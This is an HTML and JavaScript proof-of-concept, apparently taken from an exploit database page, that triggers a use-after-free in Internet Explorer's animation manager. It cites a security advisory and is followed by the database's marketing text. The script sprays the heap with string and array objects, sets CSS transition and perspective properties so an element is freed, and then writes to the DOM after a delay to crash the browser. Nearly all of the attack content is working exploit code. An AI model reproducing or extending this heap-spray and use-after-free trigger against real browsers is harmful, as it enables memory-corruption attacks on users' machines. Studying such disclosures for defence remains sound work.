<!-- PoC参考 http://www.security-assessment.com/files/documents/advisory/ie_animation_manager_uaf.pdf -->
<!DOCTYPE HTML> <html>
<head>
<script>
function boom() {
var strarr = new Array();
var arrarr = new Array();
var sprayarr = new Array();
function spray() {
var aa = "aa";
for(var i=0;i<50000;i++) {
strarr[i] = aa.toUpperCase();
arrarr[i] = new Array(1,2,3,4,5); }
for(var i=0;i<2000;i++) {
var tmparr = new Array(16000); for(var j=0;j<16000;j++) {
tmparr[j] = strarr[25000]; }
sprayarr[i] = tmparr;
}
}
//Need to pressure memory to trigger?
spray()
//Set style to free
document.getElementById("el1").style.float = 'right' document.getElementById("el1").style.transitionDuration = '1s' document.getElementById("el1").style.perspectiveOrigin = '+1.0e+100vh 1em'
//Trigger crash
setTimeout(function(){try{document.body.innerHTML += "a"}catch(e){};}, 100)} </script>
</head>
<body onload="setTimeout('boom()', 500)">
<span id="el1" ></span>
<progress></progress>
<p style="transform: translateY(1) scale(1,1) skew(1deg,1deg) scaleY(1)"></p> </body>
</html>
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation